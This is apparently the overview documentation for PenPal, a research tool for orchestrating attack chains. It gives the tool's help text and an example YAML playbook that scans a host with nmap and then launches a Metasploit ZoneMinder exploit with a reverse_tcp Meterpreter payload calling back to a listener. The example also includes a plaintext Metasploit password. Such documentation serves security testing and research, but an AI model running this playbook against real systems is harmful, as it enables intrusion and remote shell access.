Overview

PenPal ships with a executable stub called “penpal” that can be called like follows:

penpal -h
usage: penpal [-h] --config CONFIG [--debug] [--version]

PenPal is an attack orchestration tool that executes full attack-chains based on playbooks.

options:
  -h, --help       show this help message and exit
  --config CONFIG  Attack-Playbook in yaml-format
  --debug          Enable verbose output
  --version        show program's version number and exit

(Austrian Institute of Technology) https://aecid.ait.ac.at Version: 0.1.0

The configuration-file is in yaml-format. The following yaml-file is an example of a playbook.yml:

###

vars:
  $SERVER_ADDRESS: 192.42.0.254

cmd_config:
  loop_sleep: 5

msf_config:
  password: hackhelfer
  server: 10.18.3.86

commands:
  - type: shell
    cmd: nmap $SERVER_ADDRESS
    error_if: .*test.*

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.2.253
    payload: cmd/unix/python/meterpreter/reverse_tcp